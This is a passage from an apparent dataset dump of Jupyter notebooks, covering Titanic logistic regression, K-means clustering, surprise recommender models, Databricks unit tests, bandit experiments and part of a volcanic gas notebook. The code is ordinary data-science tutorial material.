"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 418 entries, 0 to 417\nData columns (total 11 columns):\nPassengerId 418 non-null int64\nPclass 418 non-null int64\nName 418 non-null object\nSex 418 non-null object\nAge 332 non-null float64\nSibSp 418 non-null int64\nParch 418 non-null int64\nTicket 418 non-null object\nFare 417 non-null float64\nCabin 91 non-null object\nEmbarked 418 non-null object\ndtypes: float64(2), int64(4), object(5)\nmemory usage: 36.0+ KB\n<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 891 entries, 0 to 890\nData columns (total 12 columns):\nPassengerId 891 non-null int64\nSurvived 891 non-null int64\nPclass 891 non-null int64\nName 891 non-null object\nSex 891 non-null object\nAge 714 non-null float64\nSibSp 891 non-null int64\nParch 891 non-null int64\nTicket 891 non-null object\nFare 891 non-null float64\nCabin 204 non-null object\nEmbarked 889 non-null object\ndtypes: float64(2), int64(5), object(5)\nmemory usage: 83.6+ KB\n"
],
[
"import matplotlib.pyplot as plt\n\nsex_pivot = train.pivot_table(index='Sex', values='Survived')\nsex_pivot.plot.bar()\nplt.show()",
"_____no_output_____"
],
[
"class_pivot = train.pivot_table(index='Pclass', values='Survived')\nclass_pivot.plot.bar()\nplt.show()",
"_____no_output_____"
],
[
"train[\"Pclass\"].unique()",
"_____no_output_____"
],
[
"train['Age'].describe()",
"_____no_output_____"
],
[
"train['Pclass'].describe()",
"_____no_output_____"
],
[
"survived = train[train['Survived'] == 1]\ndied = train[train['Survived'] == 0]\nsurvived['Age'].plot.hist(alpha=0.5,color='red',bins=50)\ndied[\"Age\"].plot.hist(alpha=0.5, color='blue', bins=50)\nplt.legend(['Survived', 'Die','dda'])\nplt.show()",
"_____no_output_____"
],
[
"def process_age(df, cut_points, label_names):\n df['Age'] = df['Age'].fillna(-0.5)\n df['Age_categories'] = pd.cut(df[\"Age\"], cut_points, labels=label_names)\n return df\n\ncut_points = [-1, 0, 18, 100]\nlabel_names = ['Missing', 'Child', 'Adult']\n\ntrain = process_age(train, cut_points, label_names)\ntest = process_age(test, cut_points, label_names)",
"_____no_output_____"
],
[
"train['Age_categories'].describe()\nholdout = process_age(holdout, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])",
"_____no_output_____"
],
[
"train = process_age(train, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])\nage_categories_pivot = train.pivot_table(index='Age_categories', values='Survived')\nage_categories_pivot.plot.bar()\nplt.show()",
"_____no_output_____"
],
[
"def create_dummies(df, column_name):\n dummies = pd.get_dummies(df[column_name], prefix=column_name)\n df = pd.concat([df, dummies], axis=1)\n return df\n\ntrain = create_dummies(train, 'Pclass')\ntest = create_dummies(test, 'Pclass')\ntrain.head()",
"_____no_output_____"
],
[
"train = create_dummies(train, 'Sex')\ntest = create_dummies(test, 'Sex')\n\n\ntrain = create_dummies(train, 'Age_categories')\ntest = create_dummies(test, 'Age_categories')\n\ntrain.head()\ntest.head()",
"_____no_output_____"
]
],
[
[
"# creating learning model",
"_____no_output_____"
]
],
[
[
"from sklearn.linear_model import LogisticRegression\n\nlr = LogisticRegression()\n\ncolumns = ['Pclass_2','Pclass_3', 'Sex_male']\nlr.fit(train[columns], train['Survived'])",
"_____no_output_____"
],
[
"columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male', \n 'Age_categories_Missing', 'Age_categories_Infant',\n 'Age_categories_Child', 'Age_categories_Teenage',\n 'Age_categories_Young', 'Age_categories_Adult',\n 'Age_categories_Senior']\n\nlr.fit(train[columns], train['Survived'])",
"_____no_output_____"
]
],
[
[
"# splitting training data",
"_____no_output_____"
]
],
[
[
"holdout = test\n\nfrom sklearn.model_selection import train_test_split\n\ncolumns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male', \n 'Age_categories_Missing', 'Age_categories_Infant',\n 'Age_categories_Child', 'Age_categories_Teenage',\n 'Age_categories_Young', 'Age_categories_Adult',\n 'Age_categories_Senior']\n\nall_X = train[columns]\nall_y = train['Survived']\n\ntrain_X, test_X, train_y, test_y = train_test_split(all_X, all_y, test_size=0.2, random_state=0)",
"_____no_output_____"
],
[
"lr = LogisticRegression()\nlr.fit(train_X, train_y)\npredictions = lr.predict(test_X)",
"_____no_output_____"
],
[
"from sklearn.metrics import accuracy_score\naccuracy = accuracy_score(test_y, predictions)",
"_____no_output_____"
],
[
"accuracy",
"_____no_output_____"
],
[
"from sklearn.metrics import confusion_matrix\n\nconf_matrix = confusion_matrix(test_y, predictions)\npd.DataFrame(conf_matrix, columns=[['Survived', 'Died']], index=[['Survived', 'Died']])",
"_____no_output_____"
],
[
"from sklearn.model_selection import cross_val_score\nimport numpy as np\n\nlr = LogisticRegression()\nscores = cross_val_score(lr, all_X, all_y, cv=10)\nnp.mean(scores)",
"_____no_output_____"
],
[
"holdout = process_age(holdout, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])\nholdout",
"_____no_output_____"
],
[
"columns",
"_____no_output_____"
],
[
"lr = LogisticRegression()\nlr.fit(all_X, all_y)\nholdout_predictions = lr.predict(holdout[columns])\nholdout_predictions",
"_____no_output_____"
],
[
"columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male',\n 'Age_categories_Missing','Age_categories_Infant',\n 'Age_categories_Child', 'Age_categories_Teenage',\n 'Age_categories_Young', 'Age_categories_Adult',\n 'Age_categories_Senior']\nholdout = holdout.drop(['Age_categories_Adult','Age_categories_Child', 'Age_categories_Missing'], axis=1)",
"_____no_output_____"
],
[
"holdout.head()",
"_____no_output_____"
],
[
"holdout['Age_categories'].unique()",
"_____no_output_____"
],
[
"holdout = create_dummies(holdout, 'Age_categories')",
"_____no_output_____"
],
[
"holdout.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 418 entries, 0 to 417\nData columns (total 24 columns):\nPassengerId 418 non-null int64\nPclass 418 non-null int64\nName 418 non-null object\nSex 418 non-null object\nAge 418 non-null float64\nSibSp 418 non-null int64\nParch 418 non-null int64\nTicket 418 non-null object\nFare 417 non-null float64\nCabin 91 non-null object\nEmbarked 418 non-null object\nAge_categories 418 non-null category\nPclass_1 418 non-null uint8\nPclass_2 418 non-null uint8\nPclass_3 418 non-null uint8\nSex_female 418 non-null uint8\nSex_male 418 non-null uint8\nAge_categories_Adult 418 non-null uint8\nAge_categories_Child 418 non-null uint8\nAge_categories_Infant 418 non-null uint8\nAge_categories_Missing 418 non-null uint8\nAge_categories_Senior 418 non-null uint8\nAge_categories_Teenage 418 non-null uint8\nAge_categories_Young 418 non-null uint8\ndtypes: category(1), float64(2), int64(4), object(5), uint8(12)\nmemory usage: 41.7+ KB\n"
],
[
"lr = LogisticRegression()\nlr.fit(all_X, all_y)\nholdout_predictions = lr.predict(holdout[columns])\nholdout_predictions",
"_____no_output_____"
],
[
"holdout_ids = holdout[\"PassengerId\"]\nsubmission_df = {\"PassengerId\": holdout_ids, 'Survived': holdout_predictions}\nsubmission = pd.DataFrame(submission_df)",
"_____no_output_____"
],
[
"submission.to_csv('titanic_submission.csv', index=False)\nsubmission.head()",
"_____no_output_____"
],
[
"holdout = holdout.drop(['Age_categories_Adult'],axis=1)\nholdout.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 418 entries, 0 to 417\nData columns (total 17 columns):\nPassengerId 418 non-null int64\nPclass 418 non-null int64\nName 418 non-null object\nSex 418 non-null object\nAge 418 non-null float64\nSibSp 418 non-null int64\nParch 418 non-null int64\nTicket 418 non-null object\nFare 417 non-null float64\nCabin 91 non-null object\nEmbarked 418 non-null object\nAge_categories 418 non-null category\nPclass_1 418 non-null uint8\nPclass_2 418 non-null uint8\nPclass_3 418 non-null uint8\nSex_female 418 non-null uint8\nSex_male 418 non-null uint8\ndtypes: category(1), float64(2), int64(4), object(5), uint8(5)\nmemory usage: 38.8+ KB\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb529a97288deed1f8f876a6ab2036ae4cded4c8 | 310,954 | ipynb | Jupyter Notebook | notebooks/04.2-Clustering-KMeans.ipynb | tardigrde/sklearn_tutorial | 68787c7809c0c5a6bfea82f4e227b0c855c231c2 | [
"BSD-3-Clause"
] | null | null | null | notebooks/04.2-Clustering-KMeans.ipynb | tardigrde/sklearn_tutorial | 68787c7809c0c5a6bfea82f4e227b0c855c231c2 | [
"BSD-3-Clause"
] | null | null | null | notebooks/04.2-Clustering-KMeans.ipynb | tardigrde/sklearn_tutorial | 68787c7809c0c5a6bfea82f4e227b0c855c231c2 | [
"BSD-3-Clause"
] | null | null | null | 590.045541 | 157,580 | 0.948346 | [
[
[
"<small><i>This notebook was put together by [Jake Vanderplas](http://www.vanderplas.com). Source and license info is on [GitHub](https://github.com/jakevdp/sklearn_tutorial/).</i></small>",
"_____no_output_____"
],
[
"# Clustering: K-Means In-Depth",
"_____no_output_____"
],
[
"Here we'll explore **K Means Clustering**, which is an unsupervised clustering technique.\n\nWe'll start with our standard set of initial imports",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nplt.style.use('seaborn')",
"_____no_output_____"
]
],
[
[
"## Introducing K-Means",
"_____no_output_____"
],
[
"K Means is an algorithm for **unsupervised clustering**: that is, finding clusters in data based on the data attributes alone (not the labels).\n\nK Means is a relatively easy-to-understand algorithm. It searches for cluster centers which are the mean of the points within them, such that every point is closest to the cluster center it is assigned to.\n\nLet's look at how KMeans operates on the simple clusters we looked at previously. To emphasize that this is unsupervised, we'll not plot the colors of the clusters:",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets.samples_generator import make_blobs\nX, y = make_blobs(n_samples=300, centers=4,\n random_state=0, cluster_std=0.60)\nplt.scatter(X[:, 0], X[:, 1], s=50);",
"_____no_output_____"
]
],
[
[
"By eye, it is relatively easy to pick out the four clusters. If you were to perform an exhaustive search for the different segmentations of the data, however, the search space would be exponential in the number of points. Fortunately, there is a well-known *Expectation Maximization (EM)* procedure which scikit-learn implements, so that KMeans can be solved relatively quickly.",
"_____no_output_____"
]
],
[
[
"from sklearn.cluster import KMeans\nest = KMeans(4) # 4 clusters\nest.fit(X)\ny_kmeans = est.predict(X)\nplt.scatter(X[:, 0], X[:, 1], c=y_kmeans, s=50, cmap='rainbow');",
"_____no_output_____"
]
],
[
[
"The algorithm identifies the four clusters of points in a manner very similar to what we would do by eye!",
"_____no_output_____"
],
[
"## The K-Means Algorithm: Expectation Maximization\n\nK-Means is an example of an algorithm which uses an *Expectation-Maximization* approach to arrive at the solution.\n*Expectation-Maximization* is a two-step approach which works as follows:\n\n1. Guess some cluster centers\n2. Repeat until converged\n A. Assign points to the nearest cluster center\n B. Set the cluster centers to the mean \n \nLet's quickly visualize this process:",
"_____no_output_____"
]
],
[
[
"from fig_code import plot_kmeans_interactive\nplot_kmeans_interactive();",
"_____no_output_____"
]
],
[
[
"This algorithm will (often) converge to the optimal cluster centers.",
"_____no_output_____"
],
[
"### KMeans Caveats\n\nThe convergence of this algorithm is not guaranteed; for that reason, scikit-learn by default uses a large number of random initializations and finds the best results.\n\nAlso, the number of clusters must be set beforehand... there are other clustering algorithms for which this requirement may be lifted.",
"_____no_output_____"
],
[
"## Application of KMeans to Digits\n\nFor a closer-to-real-world example, let's again take a look at the digits data. Here we'll use KMeans to automatically cluster the data in 64 dimensions, and then look at the cluster centers to see what the algorithm has found.",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets import load_digits\ndigits = load_digits()",
"_____no_output_____"
],
[
"est = KMeans(n_clusters=10)\nclusters = est.fit_predict(digits.data)\nest.cluster_centers_.shape",
"_____no_output_____"
]
],
[
[
"We see ten clusters in 64 dimensions. Let's visualize each of these cluster centers to see what they represent:",
"_____no_output_____"
]
],
[
[
"fig = plt.figure(figsize=(8, 3))\nfor i in range(10):\n ax = fig.add_subplot(2, 5, 1 + i, xticks=[], yticks=[])\n ax.imshow(est.cluster_centers_[i].reshape((8, 8)), cmap=plt.cm.binary)",
"_____no_output_____"
]
],
[
[
"We see that *even without the labels*, KMeans is able to find clusters whose means are recognizable digits (with apologies to the number 8)!\n\nThe cluster labels are permuted; let's fix this:",
"_____no_output_____"
]
],
[
[
"from scipy.stats import mode\n\nlabels = np.zeros_like(clusters)\nfor i in range(10):\n mask = (clusters == i)\n labels[mask] = mode(digits.target[mask])[0]",
"_____no_output_____"
]
],
[
[
"For good measure, let's use our PCA visualization and look at the true cluster labels and K-means cluster labels:",
"_____no_output_____"
]
],
[
[
"from sklearn.decomposition import PCA\n\nX = PCA(2).fit_transform(digits.data)\n\nkwargs = dict(cmap = plt.cm.get_cmap('rainbow', 10),\n edgecolor='none', alpha=0.6)\nfig, ax = plt.subplots(1, 2, figsize=(8, 4))\nax[0].scatter(X[:, 0], X[:, 1], c=labels, **kwargs)\nax[0].set_title('learned cluster labels')\n\nax[1].scatter(X[:, 0], X[:, 1], c=digits.target, **kwargs)\nax[1].set_title('true labels');",
"_____no_output_____"
]
],
[
[
"Just for kicks, let's see how accurate our K-Means classifier is **with no label information:**",
"_____no_output_____"
]
],
[
[
"from sklearn.metrics import accuracy_score\naccuracy_score(digits.target, labels)",
"_____no_output_____"
]
],
[
[
"80% – not bad! Let's check-out the confusion matrix for this:",
"_____no_output_____"
]
],
[
[
"from sklearn.metrics import confusion_matrix\nprint(confusion_matrix(digits.target, labels))\n\nplt.imshow(confusion_matrix(digits.target, labels),\n cmap='Blues', interpolation='nearest')\nplt.colorbar()\nplt.grid(False)\nplt.ylabel('true')\nplt.xlabel('predicted');",
"[[177 0 0 0 1 0 0 0 0 0]\n [ 0 55 24 1 0 1 2 0 99 0]\n [ 1 2 147 13 0 0 0 4 8 2]\n [ 0 0 0 154 0 2 0 7 7 13]\n [ 0 3 0 0 165 0 0 11 2 0]\n [ 0 0 0 0 2 136 1 0 0 43]\n [ 1 0 0 0 0 0 177 0 3 0]\n [ 0 2 0 0 0 0 0 175 2 0]\n [ 0 6 3 2 0 4 2 5 100 52]\n [ 0 20 0 6 0 6 0 8 1 139]]\n"
]
],
[
[
"Again, this is an 80% classification accuracy for an **entirely unsupervised estimator** which knew nothing about the labels.",
"_____no_output_____"
],
[
"## Example: KMeans for Color Compression\n\nOne interesting application of clustering is in color image compression. For example, imagine you have an image with millions of colors. In most images, a large number of the colors will be unused, and conversely a large number of pixels will have similar or identical colors.\n\nScikit-learn has a number of images that you can play with, accessed through the datasets module. For example:",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets import load_sample_image\nchina = load_sample_image(\"china.jpg\")\nplt.imshow(china)\nplt.grid(False);",
"_____no_output_____"
]
],
[
[
"The image itself is stored in a 3-dimensional array, of size ``(height, width, RGB)``:",
"_____no_output_____"
]
],
[
[
"china.shape",
"_____no_output_____"
]
],
[
[
"We can envision this image as a cloud of points in a 3-dimensional color space. We'll rescale the colors so they lie between 0 and 1, then reshape the array to be a typical scikit-learn input:",
"_____no_output_____"
]
],
[
[
"X = (china / 255.0).reshape(-1, 3)\nprint(X.shape)",
"_____no_output_____"
]
],
[
[
"We now have 273,280 points in 3 dimensions.\n\nOur task is to use KMeans to compress the $256^3$ colors into a smaller number (say, 64 colors). Basically, we want to find $N_{color}$ clusters in the data, and create a new image where the true input color is replaced by the color of the closest cluster.\n\nHere we'll use ``MiniBatchKMeans``, a more sophisticated estimator that performs better for larger datasets:",
"_____no_output_____"
]
],
[
[
"from sklearn.cluster import MiniBatchKMeans",
"_____no_output_____"
],
[
"# reduce the size of the image for speed\nn_colors = 64\n\nX = (china / 255.0).reshape(-1, 3)\n \nmodel = MiniBatchKMeans(n_colors)\nlabels = model.fit_predict(X)\ncolors = model.cluster_centers_\nnew_image = colors[labels].reshape(china.shape)\nnew_image = (255 * new_image).astype(np.uint8)\n\n# create and plot the new image\nwith plt.style.context('seaborn-white'):\n plt.figure()\n plt.imshow(china)\n plt.title('input: 16 million colors')\n\n plt.figure()\n plt.imshow(new_image)\n plt.title('{0} colors'.format(n_colors))",
"_____no_output_____"
]
],
[
[
"Compare the input and output image: we've reduced the $256^3$ colors to just 64.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
cb52c81cdaa326e10d80c73b5d7b70ca35c723ee | 10,112 | ipynb | Jupyter Notebook | notebooks/ipynb/dlt_workflow_refactored_unit_tests.ipynb | simondale/databricks-testing | 711a8789ea27af323676cff6f0bfd00675abcc0c | [
"MIT"
] | 6 | 2021-08-24T19:41:10.000Z | 2022-01-02T13:58:53.000Z | notebooks/ipynb/dlt_workflow_refactored_unit_tests.ipynb | simondale/databricks-testing | 711a8789ea27af323676cff6f0bfd00675abcc0c | [
"MIT"
] | null | null | null | notebooks/ipynb/dlt_workflow_refactored_unit_tests.ipynb | simondale/databricks-testing | 711a8789ea27af323676cff6f0bfd00675abcc0c | [
"MIT"
] | 1 | 2021-08-25T07:01:47.000Z | 2021-08-25T07:01:47.000Z | 5,056 | 10,111 | 0.667623 | [
[
[
"%run ./dlt",
"_____no_output_____"
],
[
"%run ./dlt_workflow_refactored",
"_____no_output_____"
],
[
"from pyspark.sql import Row\nimport unittest",
"_____no_output_____"
],
[
"from pyspark.sql.functions import lit\nimport datetime\n\n\ntimestamp = datetime.datetime.fromisoformat(\"2000-01-01T00:00:00\")\n\n\ndef timestamp_provider():\n return lit(timestamp)",
"_____no_output_____"
],
[
"from pyspark.sql.functions import when, col\nfrom pyspark.sql import Row\n\n\nclass FunctionUnitTests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n container.register(\n timestamp_provider=timestamp_provider\n )\n \n def test_add_ingest_columns(self):\n df = spark.range(1)\n df = df.transform(container.add_ingest_columns)\n result = df.collect()\n self.assertEqual(1, len(result), \"Only one record expected\")\n self.assertIn(\"ingest_timestamp\", df.columns, \"Ingest timestamp column not present\")\n self.assertIn(\"ingest_source\", df.columns, \"Ingest source column not present\")\n self.assertEqual(url.split(\"/\")[-1], result[0].ingest_source, \"Ingest source not correct\")\n self.assertEqual(timestamp, result[0].ingest_timestamp, \"Ingest timestamp not correct\")\n \n def test_add_processed_timestamp(self):\n df = spark.range(1)\n df = df.transform(container.add_processed_timestamp)\n result = df.collect()\n self.assertEqual(1, len(result), \"Only one record expected\")\n self.assertIn(\"processed_timestamp\", df.columns, \"Processed timestamp column not present\")\n self.assertEqual(timestamp, result[0].processed_timestamp, \"Processed timestamp not correct\")\n \n def test_add_null_index_array(self):\n df = spark.createDataFrame([\n Row(id=1, test_null=None),\n Row(id=2, test_null=1)\n ])\n df = df.transform(container.add_null_index_array)\n result = df.collect()\n self.assertEqual(2, len(result), \"Two records are expected\") \n self.assertIn(\"nulls\", df.columns, \"Nulls column not present\")\n self.assertIsNone(result[0].test_null, \"First record should contain null\")\n self.assertIsNotNone(result[1].test_null, \"Second record should not contain null\")\n self.assertIn(1, result[0].nulls, \"Nulls array should include 1\")\n self.assertIsNot(result[1].nulls, \"Nulls array should be empty\")\n \n def test_filter_null_index_empty(self):\n df = spark.createDataFrame([\n Row(id=1, test_null=None, nulls=[1]),\n Row(id=2, test_null=1, nulls=[])\n ])\n df = df.transform(container.filter_null_index_empty)\n result = df.collect()\n self.assertEqual(1, len(result), \"One record is expected\")\n self.assertNotIn(\"nulls\", df.columns, \"Nulls column not present\")\n \n def test_filter_null_index_not_empty(self):\n df = spark.createDataFrame([\n Row(id=1, test_null=None, nulls=[1]),\n Row(id=2, test_null=1, nulls=[])\n ])\n df = df.transform(container.filter_null_index_not_empty)\n result = df.collect()\n self.assertEqual(1, len(result), \"One record is expected\")\n self.assertIn(\"nulls\", df.columns, \"Nulls column not present\")\n \n def test_agg_count_by_country(self):\n df = spark.createDataFrame([\n Row(country=\"Country0\"),\n Row(country=\"Country1\"),\n Row(country=\"Country0\")\n ])\n df = df.transform(container.agg_count_by_country)\n result = df.collect()\n self.assertEqual(2, len(result), \"Two records expected\")\n self.assertIn(\"country\", df.columns, \"Country column not present\")\n self.assertIn(\"count\", df.columns, \"Count column not present\")\n d = {r[0]: r[1] for r in result}\n self.assertEqual(2, d.get(\"Country0\", -1), \"Country0 count should be 2\")\n self.assertEqual(1, d.get(\"Country1\", -1), \"Country1 count should be 1\")\n",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb52d309c58c0f127424e9c399aa5e6dd4e21836 | 38,915 | ipynb | Jupyter Notebook | examples/fix_budget_bai_multi_armed_bandit.ipynb | Alanthink/banditpylib | ba6dc84d87ae9e9aec48cd622ec9988dccdd18c6 | [
"MIT"
] | 20 | 2020-02-05T23:53:18.000Z | 2021-07-16T21:06:16.000Z | examples/fix_budget_bai_multi_armed_bandit.ipynb | Alanthink/banditpylib | ba6dc84d87ae9e9aec48cd622ec9988dccdd18c6 | [
"MIT"
] | 18 | 2020-02-06T00:23:26.000Z | 2021-07-06T16:37:10.000Z | examples/fix_budget_bai_multi_armed_bandit.ipynb | Alanthink/banditpylib | ba6dc84d87ae9e9aec48cd622ec9988dccdd18c6 | [
"MIT"
] | 8 | 2020-02-06T00:05:10.000Z | 2021-09-18T17:24:29.000Z | 145.749064 | 16,060 | 0.876449 | [
[
[
"import numpy as np\nimport tempfile\nimport json\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(style=\"darkgrid\")\n\nimport logging\nlogging.getLogger().setLevel(logging.INFO)\n\nfrom banditpylib import trials_to_dataframe\nfrom banditpylib.arms import BernoulliArm\nfrom banditpylib.bandits import MultiArmedBandit\nfrom banditpylib.protocols import SinglePlayerProtocol\nfrom banditpylib.learners.mab_fbbai_learner import Uniform, SR, SH",
"_____no_output_____"
],
[
"budget = 1000\nmeans = np.random.uniform(0, 1, 50)\narms = [BernoulliArm(mean) for mean in means]\nbandit = MultiArmedBandit(arms=arms)\nlearners = [Uniform(arm_num=len(arms), budget=budget, name='Uniform Sampling'), \n SR(arm_num=len(arms), budget=budget, name='Successive Rejects'),\n SH(arm_num=len(arms), budget=budget, name='Sequential Halving')]\n# For each setup, we run 500 trials\ntrials = 500\ntemp_file = tempfile.NamedTemporaryFile()",
"_____no_output_____"
],
[
"game = SinglePlayerProtocol(bandit=bandit, learners=learners)\n# Start playing the game\n# Add `debug=True` for debugging purpose\ngame.play(trials=trials, output_filename=temp_file.name)",
"INFO:absl:start Uniform Sampling's play with multi_armed_bandit\nINFO:absl:Uniform Sampling's play with multi_armed_bandit runs 2.14 seconds.\nINFO:absl:start Successive Rejects's play with multi_armed_bandit\nINFO:absl:Successive Rejects's play with multi_armed_bandit runs 3.83 seconds.\nINFO:absl:start Sequential Halving's play with multi_armed_bandit\nINFO:absl:Sequential Halving's play with multi_armed_bandit runs 1.72 seconds.\n"
],
[
"trials_df = trials_to_dataframe(temp_file.name)",
"_____no_output_____"
],
[
"trials_df.head()",
"_____no_output_____"
],
[
"fig = plt.figure()\nax = plt.subplot(111)\nsns.barplot(x='total_actions', y='regret', hue='learner', data=trials_df)\nplt.xlabel('pulls')\nplt.ylabel('error_probability')\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))",
"_____no_output_____"
],
[
"fig = plt.figure()\nax = plt.subplot(111)\nsns.barplot(x='total_actions', y='rounds', hue='learner', data=trials_df)\nplt.xlabel('pulls')\nplt.ylabel('communication_rounds')\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb52da2d02cc4b842a43fc72b62bfaece0b87eca | 5,142 | ipynb | Jupyter Notebook | surprise.ipynb | rowantseng/RecSys | 49818edb6c2dee0f80fa8985da73300b65aab663 | [
"MIT"
] | 1 | 2021-07-27T09:03:47.000Z | 2021-07-27T09:03:47.000Z | surprise.ipynb | rowantseng/RecSys | 49818edb6c2dee0f80fa8985da73300b65aab663 | [
"MIT"
] | null | null | null | surprise.ipynb | rowantseng/RecSys | 49818edb6c2dee0f80fa8985da73300b65aab663 | [
"MIT"
] | null | null | null | 21.974359 | 173 | 0.524893 | [
[
[
"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport joblib\nfrom surprise import NMF, SVD, SVDpp\nfrom surprise import Dataset\nfrom surprise.accuracy import mae as MAE\nfrom surprise.accuracy import mse as MSE\nfrom surprise.model_selection import train_test_split\n\nseed=12",
"_____no_output_____"
]
],
[
[
"## Hyperparameters",
"_____no_output_____"
]
],
[
[
"# Set for training\nfeatureNum = 10\nlr = 2e-3\nepochs = 50\n\n# Set for regularization\nregRate = 1e-2",
"_____no_output_____"
]
],
[
[
"## Load and Split Data",
"_____no_output_____"
]
],
[
[
"data = Dataset.load_builtin(\"ml-100k\")\ntrainSet, validSet = train_test_split(data, test_size=0.2, random_state=seed)",
"_____no_output_____"
],
[
"print(f\"{trainSet.n_users} users, {trainSet.n_items} items, and {trainSet.n_ratings} ratings in train\")\nprint(f\"Missing rate of train: {(1-trainSet.n_ratings/(trainSet.n_users*trainSet.n_items))*100:.3f}%\")",
"943 users, 1651 items, and 80000 ratings in train\nMissing rate of train: 94.862%\n"
],
[
"numValidRates = len(validSet)\nprint(f\"{numValidRates} ratings in valid\")\nprint(f\"Missing rate of valid: {(1-numValidRates/(trainSet.n_users*trainSet.n_items))*100:.3f}%\")",
"20000 ratings in valid\nMissing rate of valid: 98.715%\n"
]
],
[
[
"## Train and Validate FunkSVD using MSE and MAE",
"_____no_output_____"
]
],
[
[
"funksvd = SVD(n_factors=featureNum, n_epochs=epochs, lr_all=lr, reg_all=regRate, random_state=seed)\nfunksvd.fit(trainSet)\n\n# Save model\nwith open(\"surprise/funksvd.joblib\", \"wb\") as f:\n joblib.dump(funksvd, f)\n\n# Evaluate\npredSvd = funksvd.test(validSet)\nmse = MSE(predSvd)\nmae = MAE(predSvd)",
"MSE: 0.8645\nMAE: 0.7316\n"
]
],
[
[
"## Train and Validate SVD++ using MSE and MAE",
"_____no_output_____"
]
],
[
[
"svdpp = SVDpp(n_factors=featureNum, n_epochs=epochs, lr_all=lr, reg_all=regRate, random_state=seed)\nsvdpp.fit(trainSet)\n\n# Save model\nwith open(\"surprise/svdpp.joblib\", \"wb\") as f:\n joblib.dump(svdpp, f)\n\n# Evaluate\npredSvdpp = svdpp.test(validSet)\nmse = MSE(predSvdpp)\nmae = MAE(predSvdpp)",
"MSE: 0.8267\nMAE: 0.7121\n"
]
],
[
[
"## Train and Validate NMF using MSE and MAE",
"_____no_output_____"
]
],
[
[
"nmf = NMF(n_factors=featureNum, n_epochs=epochs, reg_pu=lr, reg_qi=lr, biased=True, reg_bu=regRate, reg_bi=regRate, lr_bu=regRate, lr_bi=regRate, random_state=seed)\nnmf.fit(trainSet)\n\n# Save model\nwith open(\"surprise/nmf.joblib\", \"wb\") as f:\n joblib.dump(nmf, f)\n\n# Evaluate\npredNmf = nmf.test(validSet)\nmse = MSE(predNmf)\nmae = MAE(predNmf)",
"MSE: 0.9592\nMAE: 0.7623\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb530ffd03965403a76730c2988010d27dd12a45 | 115,651 | ipynb | Jupyter Notebook | article_calculations/Monte_carlo_simulations.ipynb | Nicholaswogan/Volcano-Speciation | 2cd48e04097c2c06c215d354165cbd8dfdee3106 | [
"MIT"
] | null | null | null | article_calculations/Monte_carlo_simulations.ipynb | Nicholaswogan/Volcano-Speciation | 2cd48e04097c2c06c215d354165cbd8dfdee3106 | [
"MIT"
] | null | null | null | article_calculations/Monte_carlo_simulations.ipynb | Nicholaswogan/Volcano-Speciation | 2cd48e04097c2c06c215d354165cbd8dfdee3106 | [
"MIT"
] | null | null | null | 211.815018 | 54,336 | 0.895038 | [
[
[
"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom joblib import Parallel, delayed\nimport multiprocessing\nimport time\nfrom tqdm import tqdm\nfrom VolcGases.functions import solve_gases\n\nimport warnings\nwarnings.filterwarnings('ignore')",
"_____no_output_____"
],
[
